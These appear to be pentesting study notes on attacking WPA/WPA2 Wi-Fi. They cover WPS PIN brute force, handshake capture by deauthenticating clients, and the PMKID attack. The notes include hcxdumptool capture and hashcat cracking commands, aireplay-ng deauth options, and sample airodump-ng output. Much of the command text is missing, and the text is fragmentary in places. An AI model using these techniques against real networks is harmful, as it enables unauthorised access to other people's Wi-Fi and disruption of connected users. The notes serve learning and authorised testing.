Attacking
WPA/WPA2
Main attack methods:
- Check if WPS is enabled and brute-force the PIN.
- Capture the 4-way handshake and perform a dictionary attack to recover the PSK.
- Execute a PMKID attack on vulnerable access points.
WPS Brute force
Check if wps is enabled:
with airodump:
0: WPS is not supported by the access point. 1: WPS is enabled but not configured. 2: WPS is enabled and configured.
with wash:
if Lck = No, WPS is enabled.Also, determine the vendor with the first three sets from the MAC
Bruteforce WPS key with reaver
turn off monitor mode from airmon to ensure Reaver works.
use the iw command to add a new interface named mon0 and set its type to monitor mode.
Launch Reaver specifying the BSSID of our target, the appropriate channel, and our interface in monitor mode (mon0)
Cracking MIC (4-Way Handshake)
Capture the MIC
Identify networks (save to file WPA)
Deauth clients and capture handshake on reconnect
After a few seconds a WPA handshake should be captured in the airodump output.
We need to ensure we've captured the complete handshake before attempting to crack
With cowpatty:
-c
= check mode
or with wireshark:
check the following:
- All four EAPOL messages exist per each handshake in sequential order
- Key nonce values are the same in message 1 and 3
- For message four, we should see no key nonce value and only a MIC value.
Crack the handshake
with cowpatty:
or with aircrack
PMKID Attack
This attack utilizes a feature of WPA and WPA2 protocols that allows roaming (switching from one access point to another seamlessly), routers store the "PMKID" in a cache to make roaming easier. This attack is so powerful because it allows an attacker to capture and crack the PMK without first deauthing clients.
Put interface into monitor mode
scan for the target network and determine if it is vulnerable to the PMKID attack. We need to monitor for these three status codes: 1. EAPOL 2. ASSOCIATION and REASSOCIATION 3. EAPOL and ASSOCIATION and REASSOCIATION
For hcxtools <= 6.2.9
We want to see thePMKID
in the output, now we discover the bssid with aerodump
Once we have the bssid of the target, we can properly target with hcxdumptool
hcxdumptool -i wlan0mon --enable_status=3 --filterlist_ap=E2:73:E7:F5:98:91 --filtermode=2 -o PMKIDCap.pcap
I can take a very long time to capture the PMKID, you can speed it up by executing the command again
Now we can convert the pcap to a hash to crack
Now Crack the hash
hashcat -m 22000 --force hash /opt/wordlist.txt
hashcat -m 22000 --force hash /opt/wordlist.txt --show
For hcxtools >= 6.3.0
Generate a BPF file
One AP:
Multiple:
Run against target
You are looking for a +
under the 3 or the P column.
Convert to hash and crack (dictionary)
Deauth attacks
List attack modes
aireplay-ng
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
Attack | Attack Name |
---|---|
Attack 0 |
Deauthentication |
Attack 1 |
Fake authentication |
Attack 2 |
Interactive packet replay |
Attack 3 |
ARP request replay attack |
Attack 4 |
KoreK chopchop attack |
Attack 5 |
Fragmentation attack |
Attack 6 |
Cafe-latte attack |
Attack 7 |
Client-oriented fragmentation attack |
Attack 8 |
WPA Migration Mode |
Attack 9 |
Injection test |
Before sending deauthentication frames, it's important to verify if our wireless card can successfully inject frames into the target access point (AP).
- Enable monitor mode on channel
- test for packet injection
Injection is working!
)
Now we know we can inject packets with our interface, lets perform the deauth
Identify the AP
sudo airodump-ng wlan0mon
CH 1 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 1 54. OPN TOMMY
00:14:6C:7A:41:81 34 100 57 14 1 1 11e WPA TKIP PSK HTB
00:14:6C:7E:40:80 32 100 752 73 2 1 54 WPA TKIP PSK jhony
BSSID STATION PWR Rate Lost Frames Notes Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 36-24 2 14 HTB
(not associated) 00:14:A4:3F:8D:13 19 0-0 0 4
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5 HTB
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 54-54 0 99 jhony
From the above output, we can see that there are three available WiFi networks, and two clients
are connected to the network named HTB
. Let's send a deauthentication request to one of the clients with the station ID 00:0F:B5:32:31:31
.
-0
means deauthentication
- 5
is the number of deauths to send (you can send multiple if you wish); 0
means send them continuously
- -a 00:14:6C:7A:41:81
is the MAC address of the access point
- -c 00:0F:B5:32:31:31
is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
- wlan0mon
is the interface name
Once the clients are deauthenticated from the AP, we can continue observing airodump-ng
to see when they reconnect.
sudo airodump-ng wlan0mon
CH 1 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7A:41:81
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 1 54. OPN TOMMY
00:14:6C:7A:41:81 34 100 57 14 1 1 11e WPA TKIP PSK HTB
00:14:6C:7E:40:80 32 100 752 73 2 1 54 WPA TKIP PSK jhony
BSSID STATION PWR Rate Lost Frames Notes Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 36-24 212 145 EAPOL HTB
(not associated) 00:14:A4:3F:8D:13 19 0-0 0 4
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5 HTB
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 54-54 0 9 jhony
In the output above, we can see that after sending the deauthentication packet, the client disconnects and then reconnects. This is evidenced by the increase in Lost
packets and Frames
count.
Additionally, a four-way handshake
would be captured by airodump-ng
, as shown in the output. By using the -w
option in airodump-ng, we can save the captured WPA handshake into a .pcap
file. This file can then be used with tools like aircrack-ng
to crack the pre-shared key (PSK)